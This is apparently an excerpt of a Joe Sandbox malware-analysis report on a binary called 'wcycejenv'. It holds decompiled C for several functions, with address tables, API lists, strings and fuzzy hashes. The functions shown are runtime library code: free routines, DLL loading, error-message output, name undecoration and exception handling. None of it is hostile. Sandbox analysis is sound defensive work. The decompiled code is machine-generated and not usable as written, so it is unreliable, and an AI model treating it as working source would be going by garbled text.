									 *0x4492c4(_t246);
									_t180 =  *((intOrPtr*)( *_t106))();
									_t231 = _v728;
									__eflags = _t180;
									if(_t180 == 0) {
										__eflags = _t231 - 0x454370;
										if(_t231 == 0x454370) {
											L44:
											_t181 = _v716;
										} else {
											_t257 = _t210 + _t210;
											__eflags = _t257;
											asm("lock xadd [eax], ecx");
											if(_t257 != 0) {
												goto L44;
											} else {
												E0042E2C2( *((intOrPtr*)(_t246 + 0x28 + _t257 * 8)));
												E0042E2C2( *((intOrPtr*)(_t246 + 0x24 + _t257 * 8)));
												E0042E2C2( *(_t246 + 0xa0 + _t210 * 4));
												_t181 = _v716;
												_t234 = _v704;
												 *(_t181 + _t246) = _t234;
												 *(_t246 + 0xa0 + _t210 * 4) = _t234;
											}
										}
										_t232 = _v732;
										 *_t232 = 1;
										_t155 =  *(_t181 + _t246);
										 *((intOrPtr*)(_t246 + 0x28 + (_t210 + _t210) * 8)) = _t232;
									} else {
										 *((intOrPtr*)(_v716 + _t246)) = _t231;
										E0042E2C2( *(_t246 + 0xa0 + _t210 * 4));
										 *(_t246 + 0xa0 + _t210 * 4) = _v740;
										E0042E2C2(_v732);
										 *(_t246 + 8) = _v744;
										goto L39;
									}
									goto L40;
								}
							}
						} else {
							_t155 = _t244;
							L40:
							_pop(_t247);
							_pop(_t250);
							_pop(_t211);
							return E004085C2(_t155, _t211, _v8 ^ _t261, _t244, _t247, _t250);
						}
						goto L52;
					}
					asm("sbb eax, eax");
					_t158 = _t157 | 0x00000001;
					__eflags = _t158;
					goto L8;
				}
				L52:
			}

0x0042a560
0x0042a56b
0x0042a572
0x0042a575
0x0042a576
0x0042a579
0x0042a57d
0x0042a57e
0x0042a581
0x0042a591
0x0042a5b4
0x0042a5b9
0x0042a5be
0x0042a896
0x0042a896
0x0042a896
0x00000000
0x0042a5c4
0x0042a5c4
0x0042a5c7
0x0042a5ca
0x0042a5d0
0x0042a5d6
0x0042a5d9
0x0042a5db
0x0042a5de
0x0042a5e8
0x0042a5ee
0x00000000
0x00000000
0x0042a5f4
0x0042a61d
0x0042a61d
0x0042a5f6
0x0042a5f6
0x0042a5fe
0x0042a605
0x0042a60b
0x00000000
0x0042a60d
0x0042a60d
0x0042a610
0x0042a61b
0x00000000
0x00000000
0x00000000
0x00000000
0x0042a61b
0x0042a60b
0x0042a62a
0x0042a62c
0x0042a635
0x0042a63b
0x0042a63e
0x0042a63e
0x0042a641
0x0042a644
0x0042a644
0x0042a654
0x0042a662
0x0042a667
0x0042a66e
0x0042a670
0x00000000
0x0042a676
0x0042a67c
0x0042a689
0x0042a692
0x0042a6a5
0x0042a6ac
0x0042a6b1
0x0042a6b4
0x0042a6b6
0x0042a916
0x0042a91c
0x0042a91d
0x0042a91e
0x0042a91f
0x0042a920
0x0042a921
0x0042a926
0x0042a929
0x0042a930
0x0042a930
0x0042a933
0x0042a949
0x0042a949
0x0042a94c
0x0042a935
0x0042a935
0x0042a935
0x0042a938
0x0042a946
0x0042a948
0x0042a93a
0x0042a93a
0x0042a93d
0x00000000
0x0042a93f
0x0042a941
0x0042a943
0x0042a943
0x0042a93d
0x0042a938
0x0042a6bc
0x0042a6bc
0x0042a6ca
0x0042a6cd
0x0042a6e3
0x0042a6ea
0x0042a6f0
0x0042a6cf
0x0042a6cf
0x0042a6d7
0x00000000
0x0042a6d9
0x0042a6d9
0x0042a6df
0x0042a6df
0x0042a6d7
0x0042a6f6
0x0042a6fd
0x0042a700
0x0042a820
0x0042a823
0x0042a830
0x0042a833
0x0042a83b
0x0042a83b
0x0042a825
0x0042a82b
0x0042a82b
0x0042a706
0x0042a706
0x0042a70c
0x0042a714
0x0042a716
0x0042a719
0x0042a722
0x0042a72b
0x0042a731
0x0042a734
0x0042a736
0x00000000
0x00000000
0x0042a738
0x0042a73e
0x0042a73f
0x0042a74a
0x0042a752
0x0042a75a
0x0042a75d
0x0042a760
0x0042a766
0x0042a76c
0x0042a772
0x0042a778
0x0042a77b
0x00000000
0x00000000
0x0042a77d
0x0042a7a2
0x0042a7a2
0x0042a7a5
0x0042a7c2
0x0042a7c7
0x0042a7ca
0x0042a7cc
0x0042a80a
0x0042a7ce
0x0042a7ce
0x0042a7d4
0x0042a7d9
0x0042a7e1
0x0042a7e2
0x0042a7e2
0x0042a7f9
0x0042a800
0x0042a803
0x0042a805
0x0042a805
0x0042a810
0x0042a816
0x0042a816
0x0042a81b
0x00000000
0x0042a81b
0x0042a77f
0x0042a781
0x0042a786
0x0042a78c
0x0042a795
0x0042a79e
0x0042a79e
0x00000000
0x0042a781
0x0042a83e
0x0042a83e
0x0042a842
0x0042a84a
0x0042a850
0x0042a853
0x0042a859
0x0042a85b
0x0042a8a7
0x0042a8ad
0x0042a8f9
0x0042a8f9
0x0042a8af
0x0042a8b4
0x0042a8b4
0x0042a8ba
0x0042a8be
0x00000000
0x0042a8c0
0x0042a8c4
0x0042a8cd
0x0042a8d9
0x0042a8de
0x0042a8e7
0x0042a8ed
0x0042a8f0
0x0042a8f0
0x0042a8be
0x0042a8ff
0x0042a907
0x0042a90d
0x0042a910
0x0042a85d
0x0042a863
0x0042a86d
0x0042a87f
0x0042a886
0x0042a893
0x00000000
0x0042a893
0x00000000
0x0042a85b
0x0042a6b6
0x0042a62e
0x0042a62e
0x0042a898
0x0042a89b
0x0042a89c
0x0042a89f
0x0042a8a6
0x0042a8a6
0x00000000
0x0042a62c
0x0042a625
0x0042a627
0x0042a627
0x00000000
0x0042a627
0x00000000

APIs

Part of subcall function 0042DA10: GetLastError.KERNEL32(?,?,?,0041338C,?,?,?,?,00416B39,?), ref: 0042DA15
Part of subcall function 0042DA10: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,0041338C,?,?,?,?,00416B39,?), ref: 0042DAB3

_free.LIBCMT ref: 0042A86D
_free.LIBCMT ref: 0042A886
_free.LIBCMT ref: 0042A8C4
_free.LIBCMT ref: 0042A8CD
_free.LIBCMT ref: 0042A8D9

Strings

pCE, xrefs: 0042A8A7
C, xrefs: 0042A6BC

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: _free$ErrorLast
String ID: C$pCE
API String ID: 3291180501-2133994596
Opcode ID: bdf4b583dee93eb0c673f1e386cd2d611a1cc78d08ac5ebc651ec70db92e0f8a
Instruction ID: f0b659a79c5e5eacf1d78406c1e32d77f490f09480d9451e37172d247912d637
Opcode Fuzzy Hash: bdf4b583dee93eb0c673f1e386cd2d611a1cc78d08ac5ebc651ec70db92e0f8a
Instruction Fuzzy Hash: B5C19F75A0122A9FDB24DF19D884AAEB3B4FF48304F5045EEE849A7350D734AE91CF49

Uniqueness

Uniqueness Score: -1.00%

Function 0042C71E Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 77
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0042C71E(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int* _v8;
				void** _t12;
				void* _t16;
				void* _t18;
				signed int _t22;
				WCHAR* _t23;
				void** _t26;
				signed int* _t29;
				void* _t32;
				void* _t34;

				_t29 = _a4;
				while(_t29 != _a8) {
					_t22 =  *_t29;
					_t12 = 0x456a18 + _t22 * 4;
					_t32 =  *_t12;
					_v8 = _t12;
					if(_t32 == 0) {
						_t23 =  *(0x44ac18 + _t22 * 4);
						_t32 = LoadLibraryExW(_t23, 0, 0x800);
						if(_t32 != 0) {
							L12:
							_t26 = _v8;
							 *_t26 = _t32;
							if( *_t26 != 0) {
								FreeLibrary(_t32);
							}
							L14:
							if(_t32 != 0) {
								_t16 = _t32;
								L18:
								return _t16;
							}
							L15:
							_t29 =  &(_t29[1]);
							continue;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L9:
							_t32 = 0;
							L10:
							if(_t32 != 0) {
								goto L12;
							}
							 *_v8 = _t18 | 0xffffffff;
							goto L15;
						}
						_t18 = E0042BDB8(_t23, L"api-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = E0042BDB8(_t23, L"ext-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = LoadLibraryExW(_t23, _t32, _t32);
						_t32 = _t18;
						goto L10;
					}
					if(_t32 == 0xffffffff) {
						goto L15;
					}
					goto L14;
				}
				_t16 = 0;
				goto L18;
			}

0x0042c727
0x0042c7d1
0x0042c72f
0x0042c731
0x0042c738
0x0042c73a
0x0042c740
0x0042c74d
0x0042c762
0x0042c766
0x0042c7b8
0x0042c7b8
0x0042c7bd
0x0042c7c1
0x0042c7c4
0x0042c7c4
0x0042c7ca
0x0042c7cc
0x0042c7e1
0x0042c7dc
0x0042c7e0
0x0042c7e0
0x0042c7ce
0x0042c7ce
0x00000000
0x0042c7ce
0x0042c768
0x0042c771
0x0042c7a8
0x0042c7a8
0x0042c7aa
0x0042c7ac
0x00000000
0x00000000
0x0042c7b4
0x00000000
0x0042c7b4
0x0042c77b
0x0042c780
0x0042c785
0x00000000
0x00000000
0x0042c78f
0x0042c794
0x0042c799
0x00000000
0x00000000
0x0042c79e
0x0042c7a4
0x00000000
0x0042c7a4
0x0042c745
0x00000000
0x00000000
0x00000000
0x0042c74b
0x0042c7da
0x00000000

Strings

9kA, xrefs: 0042C720
ext-ms-, xrefs: 0042C789
api-ms-, xrefs: 0042C775

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID:
String ID: 9kA$api-ms-$ext-ms-
API String ID: 0-3315991548
Opcode ID: 95295790dfe4a661c375ba3bfb54413387581be9fa416ce489abb590a4f5dea8
Instruction ID: f0b505c62ba3d669453d0f30b841b16ace003002f83f0013dab0d61415c4f974
Opcode Fuzzy Hash: 95295790dfe4a661c375ba3bfb54413387581be9fa416ce489abb590a4f5dea8
Instruction Fuzzy Hash: B621C676B41233ABDB214724ACC4B5F37989F81B61F650127E906A7390D738ED019ED9

Uniqueness

Uniqueness Score: -1.00%

Function 00404420 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 62
windowCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E00404420(void* _a4, char _a8) {
				short _v8;
				char* _v12;
				long _v16;
				signed char* _v20;
				long _v24;
				long _t25;
				signed char* _t26;
				signed char* _t32;
				void* _t40;

				_v12 =  &_a8;
				_v8 = 0;
				_v16 = FormatMessageW(0x500, _a4, 0, 0,  &_v8, 0,  &_v12);
				_v12 = 0;
				if(_v16 != 0) {
					L6:
					E00404330(_v8, _v8, _v16, GetStdHandle(0xfffffff4));
					return LocalFree(_v8);
				}
				_t25 = GetLastError();
				if(_t25 == 0xeb) {
					goto L6;
				} else {
					goto L2;
				}
				do {
					L2:
					_t32 =  *0x4494a8; // 0x4533bc
					if(( *_t32 & 1) != 0) {
						_t26 =  *0x4494a8; // 0x4533bc
						_v20 = _t26;
						_v24 = 0;
						_push(E00406150(_a4));
						_t25 = E00406000(_v24, _v20, "WCMD_output_stderr", "Could not format string: le=%lu, fmt=%s\n", GetLastError());
						_t40 = _t40 + 0x18;
					}
				} while (0 != 0);
				return _t25;
			}

0x00404429
0x0040442c
0x00404450
0x00404453
0x0040445e
0x004044bb
0x004044cc
0x00000000
0x004044d5
0x00404460
0x0040446b
0x00000000
0x00000000
0x00000000
0x00000000
0x0040446d
0x0040446d
0x0040446d
0x00404479
0x0040447b
0x00404480
0x00404483
0x00404493
0x004044ad
0x004044b2
0x004044b2
0x004044b5
0x00000000

APIs

FormatMessageW.KERNEL32(00000500,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040444A
GetLastError.KERNEL32 ref: 00404460
GetLastError.KERNEL32(00000000,00000000), ref: 00404494
GetStdHandle.KERNEL32(000000F4), ref: 004044BD
LocalFree.KERNEL32(00000000,00000000,00000000,00000000), ref: 004044D5

Strings

WCMD_output_stderr, xrefs: 004044A0
Could not format string: le=%lu, fmt=%s, xrefs: 0040449B

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: ErrorLast$FormatFreeHandleLocalMessage
String ID: Could not format string: le=%lu, fmt=%s$WCMD_output_stderr
API String ID: 2131822503-2876152280
Opcode ID: c6998d83376fd0909bfe7037087281aa027a3dbb89f68039896187c3e7f97f13
Instruction ID: 49f387ba1a45796a403cf51f69c702e675201a6838965edc7e1d9a2e310dc7ed
Opcode Fuzzy Hash: c6998d83376fd0909bfe7037087281aa027a3dbb89f68039896187c3e7f97f13
Instruction Fuzzy Hash: 52212EB5900208BFDB00DFE4DC45BAF77B8EB49315F108169FA05A72D0D7795A00DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040C3E1 Relevance: 10.7, APIs: 7, Instructions: 151
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 87%

			E0040C3E1(void* __ebx, intOrPtr* _a4, intOrPtr* _a8) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				signed int _v24;
				char _v28;
				char _v36;
				char _v44;
				char* _t50;
				void* _t54;
				intOrPtr* _t57;
				void* _t62;
				intOrPtr* _t68;
				intOrPtr* _t69;
				char* _t73;
				void* _t77;
				void* _t78;
				intOrPtr* _t83;
				char* _t88;
				intOrPtr* _t104;
				void* _t108;
				void* _t113;
				char _t115;
				void* _t118;
				void* _t119;
				void* _t123;

				_t50 =  *0x456018; // 0x0
				_t119 = _t118 - 0x28;
				if( *_t50 == 0) {
					_t51 = _a8;
					_t115 = 0;
					if( *_a8 == 0) {
						goto L16;
					} else {
						_v28 = ")[";
						_v24 = 2;
						_t54 = E0040AF2E(E0040AEA6(E0040AE59(_t85,  &_v44, 0x28, _t51),  &_v36,  &_v28),  &_v20, 1);
						_t88 =  &_v12;
						goto L17;
					}
					L21:
				} else {
					_t113 = E0040E514();
					_t123 = _t113;
					if(_t123 < 0 || _t123 == 0) {
						_t115 = 0;
						L16:
						_v12 = _t115;
						_v8 = _t115;
						E0040BF7E( &_v12, 0x5b);
						_t54 = E0040AF2E( &_v12,  &_v44, 1);
						_t88 =  &_v36;
						L17:
						E0040C634(_a4, E0040AEEA(_t54, _t88, 0x5d));
						_t57 = _a4;
					} else {
						_t83 = _a8;
						_v12 = 0;
						_v8 = 0;
						if(( *(_t83 + 4) & 0x00000800) == 0) {
							L5:
							_t62 = _t113;
							_t113 = _t113 - 1;
							if(_t62 != 0) {
								_t73 =  *0x456018; // 0x0
								if( *_t73 != 0) {
									_t77 = E0040AE59(_t85,  &_v36, 0x5b, E0040D858(_t108,  &_v20, 0));
									_t119 = _t119 + 0x14;
									_t78 = E0040AEEA(_t77,  &_v44, 0x5d);
									_t85 =  &_v12;
									E0040AFC2( &_v12, _t78);
									goto L8;
								}
							}
						} else {
							_v20 = 0x449990;
							_t85 =  &_v12;
							_v16 = 2;
							E0040AF6A( &_v12,  &_v20);
							L8:
							if(_v8 <= 1) {
								goto L5;
							}
						}
						if( *_t83 != 0) {
							if(( *(_t83 + 4) & 0x00000800) == 0) {
								_t68 = E0040AEEA(E0040AE59(_t85,  &_v44, 0x28, _t83),  &_v36, 0x29);
								_push( &_v12);
								_push( &_v20);
								_t104 = _t68;
							} else {
								_t104 = _t83;
								_push( &_v12);
								_push( &_v44);
							}
							_t69 = E0040AEC8(_t104);
							_v12 =  *_t69;
							_v8 =  *((intOrPtr*)(_t69 + 4));
						}
						E0040EF7E(_t83,  &_v28,  &_v12);
						_t57 = _a4;
						 *_t57 = _v28;
						 *(_t57 + 4) = _v24 | 0x00000800;
					}
				}
				return _t57;
				goto L21;
			}

0x0040c3e4
0x0040c3e9
0x0040c3f1
0x0040c537
0x0040c53a
0x0040c53e
0x00000000
0x0040c540
0x0040c544
0x0040c54e
0x0040c574
0x0040c579
0x00000000
0x0040c579
0x00000000
0x0040c3f7
0x0040c3fc
0x0040c3fe
0x0040c400
0x0040c4f8
0x0040c4fa
0x0040c4ff
0x0040c502
0x0040c505
0x0040c513
0x0040c518
0x0040c51b
0x0040c529
0x0040c52e
0x0040c40c
0x0040c40d
0x0040c412
0x0040c415
0x0040c41f
0x0040c43d
0x0040c43d
0x0040c43f
0x0040c442
0x0040c444
0x0040c44c
0x0040c45f
0x0040c464
0x0040c46f
0x0040c475
0x0040c478
0x00000000
0x0040c478
0x0040c44c
0x0040c421
0x0040c424
0x0040c42c
0x0040c42f
0x0040c436
0x0040c47d
0x0040c481
0x00000000
0x00000000
0x0040c481
0x0040c485
0x0040c48e
0x0040c4b3
0x0040c4bb
0x0040c4bf
0x0040c4c0
0x0040c490
0x0040c493
0x0040c495
0x0040c499
0x0040c499
0x0040c4c2
0x0040c4c9
0x0040c4cf
0x0040c4cf
0x0040c4da
0x0040c4df
0x0040c4f0
0x0040c4f2
0x0040c4f5
0x0040c400
0x0040c536
0x00000000

APIs

DName::operator+.LIBCMT ref: 0040C46F
DName::operator+.LIBCMT ref: 0040C4C2

Part of subcall function 0040AF6A: shared_ptr.LIBCMT ref: 0040AF86

Part of subcall function 0040AE59: DName::operator+.LIBCMT ref: 0040AE7A

DName::operator+.LIBCMT ref: 0040C4B3
DName::operator+.LIBCMT ref: 0040C513
DName::operator+.LIBCMT ref: 0040C520
DName::operator+.LIBCMT ref: 0040C567
DName::operator+.LIBCMT ref: 0040C574

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: Name::operator+$shared_ptr
String ID:
API String ID: 1037112749-0
Opcode ID: a7f66f1cd4fa5727440d04a50d728014dfe302b7fe1ab60b4e10ca9aa68d52ce
Instruction ID: 7bb5894edfbfe0d8a625bfc22d597f940b0e9b6d89324745b5272d5af830f55b
Opcode Fuzzy Hash: a7f66f1cd4fa5727440d04a50d728014dfe302b7fe1ab60b4e10ca9aa68d52ce
Instruction Fuzzy Hash: C75163B1900218EBDB15DB94D895EEEBBB8BB08704F04416FF505B72C1DB789A44CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00409940 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00409940(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _t52;
				signed int _t59;
				intOrPtr _t60;
				void* _t61;
				intOrPtr* _t62;
				intOrPtr _t64;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t72;
				intOrPtr* _t76;
				intOrPtr _t77;
				signed int _t81;
				char _t83;
				intOrPtr _t86;
				intOrPtr _t93;
				intOrPtr _t96;
				intOrPtr* _t98;
				void* _t102;
				void* _t104;
				void* _t111;

				_t89 = __edx;
				_t76 = _a4;
				_push(__edi);
				_v5 = 0;
				_v16 = 1;
				 *_t76 = E004485EB(__ecx,  *_t76);
				_t77 = _a8;
				_t6 = _t77 + 0x10; // 0x11
				_t96 = _t6;
				_push(_t96);
				_v20 = _t96;
				_v12 =  *(_t77 + 8) ^  *0x454264;
				E00409900(_t77, __edx, __edi, _t96,  *(_t77 + 8) ^  *0x454264);
				E0040A1B2(_a12);
				_t52 = _a4;
				_t104 = _t102 - 0x1c + 0x10;
				_t93 =  *((intOrPtr*)(_t77 + 0xc));
				if(( *(_t52 + 4) & 0x00000066) != 0) {
					__eflags = _t93 - 0xfffffffe;
					if(_t93 != 0xfffffffe) {
						_t89 = 0xfffffffe;
						E0040A190(_t77, 0xfffffffe, _t96, 0x454264);
						goto L13;
					}
					goto L14;
				} else {
					_v32 = _t52;
					_v28 = _a12;
					 *((intOrPtr*)(_t77 - 4)) =  &_v32;
					if(_t93 == 0xfffffffe) {
						L14:
						return _v16;
					} else {
						do {
							_t81 = _v12;
							_t59 = _t93 + (_t93 + 2) * 2;
							_t77 =  *((intOrPtr*)(_t81 + _t59 * 4));
							_t60 = _t81 + _t59 * 4;
							_t82 =  *((intOrPtr*)(_t60 + 4));
							_v24 = _t60;
							if( *((intOrPtr*)(_t60 + 4)) == 0) {
								_t83 = _v5;
								goto L7;
							} else {
								_t89 = _t96;
								_t61 = E0040A130(_t82, _t96);
								_t83 = 1;
								_v5 = 1;
								_t111 = _t61;
								if(_t111 < 0) {
									_v16 = 0;
									L13:
									_push(_t96);
									E00409900(_t77, _t89, _t93, _t96, _v12);
									goto L14;
								} else {
									if(_t111 > 0) {
										_t62 = _a4;
										__eflags =  *_t62 - 0xe06d7363;
										if( *_t62 == 0xe06d7363) {
											__eflags =  *0x449520;
											if(__eflags != 0) {
												_t72 = E00444C40(__eflags, 0x449520);
												_t104 = _t104 + 4;
												__eflags = _t72;
												if(_t72 != 0) {
													_t98 =  *0x449520; // 0x409d3a
													 *0x4492c4(_a4, 1);
													 *_t98();
													_t96 = _v20;
													_t104 = _t104 + 8;
												}
												_t62 = _a4;
											}
										}
										_t90 = _t62;
										E0040A170(_t62, _a8, _t62);
										_t64 = _a8;
										__eflags =  *((intOrPtr*)(_t64 + 0xc)) - _t93;
										if( *((intOrPtr*)(_t64 + 0xc)) != _t93) {
											_t90 = _t93;
											E0040A190(_t64, _t93, _t96, 0x454264);
											_t64 = _a8;
										}
										_push(_t96);
										 *((intOrPtr*)(_t64 + 0xc)) = _t77;
										E00409900(_t77, _t90, _t93, _t96, _v12);
										_t86 =  *((intOrPtr*)(_v24 + 8));
										E0040A150();
										asm("int3");
										_t66 = E0040A446();
										__eflags = _t66;
										if(_t66 != 0) {
											_t67 = E0040A3F8(_t86);
											__eflags = _t67;
											if(_t67 != 0) {
												return 1;
											} else {
												E0040A497();
												goto L24;
											}
										} else {
											L24:
											__eflags = 0;
											return 0;
										}
									} else {
										goto L7;
									}
								}
							}
							goto L28;
							L7:
							_t93 = _t77;
						} while (_t77 != 0xfffffffe);
						if(_t83 != 0) {
							goto L13;
						}
						goto L14;
					}
				}
				L28:
			}

0x00409940
0x00409947
0x0040994b
0x0040994c
0x00409952
0x0040995e
0x00409960
0x00409966
0x00409966
0x0040996f
0x00409971
0x00409974
0x00409977
0x0040997f
0x00409984
0x00409987
0x0040998a
0x00409991
0x004099ed
0x004099f0
0x004099f8
0x004099ff
0x00000000
0x004099ff
0x00000000
0x00409993
0x00409993
0x00409999
0x0040999f
0x004099a5
0x00409a10
0x00409a19
0x004099a7
0x004099a7
0x004099a7
0x004099ad
0x004099b0
0x004099b3
0x004099b6
0x004099b9
0x004099be
0x004099d4
0x00000000
0x004099c0
0x004099c0
0x004099c2
0x004099c7
0x004099c9
0x004099cc
0x004099ce
0x004099e4
0x00409a04
0x00409a04
0x00409a08
0x00000000
0x004099d0
0x004099d0
0x00409a1a
0x00409a1d
0x00409a23
0x00409a25
0x00409a2c
0x00409a33
0x00409a38
0x00409a3b
0x00409a3d
0x00409a3f
0x00409a4c
0x00409a52
0x00409a54
0x00409a57
0x00409a57
0x00409a5a
0x00409a5a
0x00409a2c
0x00409a60
0x00409a62
0x00409a67
0x00409a6a
0x00409a6d
0x00409a75
0x00409a79
0x00409a7e
0x00409a7e
0x00409a81
0x00409a85
0x00409a88
0x00409a95
0x00409a98
0x00409a9d
0x00409a9e
0x00409aa3
0x00409aa5
0x00409aaa
0x00409aaf
0x00409ab1
0x00409abc
0x00409ab3
0x00409ab3
0x00000000
0x00409ab3
0x00409aa7
0x00409aa7
0x00409aa7
0x00409aa9
0x00409aa9
0x004099d2
0x00000000
0x004099d2
0x004099d0
0x004099ce
0x00000000
0x004099d7
0x004099d7
0x004099d9
0x004099e0
0x00000000
0x004099e2
0x00000000
0x004099e0
0x004099a5
0x00000000

APIs

_ValidateLocalCookies.LIBCMT ref: 00409977
___except_validate_context_record.LIBVCRUNTIME ref: 0040997F
_ValidateLocalCookies.LIBCMT ref: 00409A08
__IsNonwritableInCurrentImage.LIBCMT ref: 00409A33
_ValidateLocalCookies.LIBCMT ref: 00409A88

Strings

csm, xrefs: 00409A1D

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: a45ffc50eb89d8621195b7948ffc826a056443bdfda7ba11750707f5e911aa8e
Instruction ID: 3f6fc5de3a853a362be6418dec8b1af7a2637b8884262505d1f707ce070e9580
Opcode Fuzzy Hash: a45ffc50eb89d8621195b7948ffc826a056443bdfda7ba11750707f5e911aa8e
Instruction Fuzzy Hash: 1C41B474A00258ABCF10DF69C881A9FBBA0AF45318F14806AE8157B3D3D7399D15CF99

Uniqueness

Uniqueness Score: -1.00%

Function 004274C2 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 109
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E004274C2(void* __ebx, signed short* __edx, void* __esi, void* __eflags, intOrPtr _a4) {
				signed short* _v0;
				intOrPtr _v4;
				signed int _v8;
				signed int _v12;
				char _v13;
				intOrPtr _v16;
				intOrPtr _v28;
				void _v512;
				long _v516;
				void* __edi;
				signed int _t23;
				signed int _t32;
				void* _t33;
				char* _t37;
				signed short* _t40;
				void* _t41;
				void* _t42;
				void* _t43;
				void* _t44;
				signed int _t46;
				signed int _t49;

				_t42 = __esi;
				_t40 = __edx;
				_t33 = __ebx;
				_t46 = _t49;
				if(E00430754(3) == 1 || __eax == 0 &&  *0x45606c == 1) {
					_pop(_t46);
					_push(_t46);
					_t47 = _t49;
					_t23 =  *0x454264; // 0x8c4320d5
					_v8 = _t23 ^ _t49;
					_push(_t42);
					_t43 = GetStdHandle(0xfffffff4);
					if(_t43 != 0 && _t43 != 0xffffffff) {
						_t40 = _v0;
						_t37 =  &_v512;
						while(1) {
							 *_t37 =  *_t40;
							_t37 = _t37 + 1;
							if(_t37 ==  &_v12) {
								break;
							}
							_t32 =  *_t40 & 0x0000ffff;
							_t40 =  &(_t40[1]);
							if(_t32 != 0) {
								continue;
							}
							break;
						}
						_v13 = 0;
						_v516 = 0;
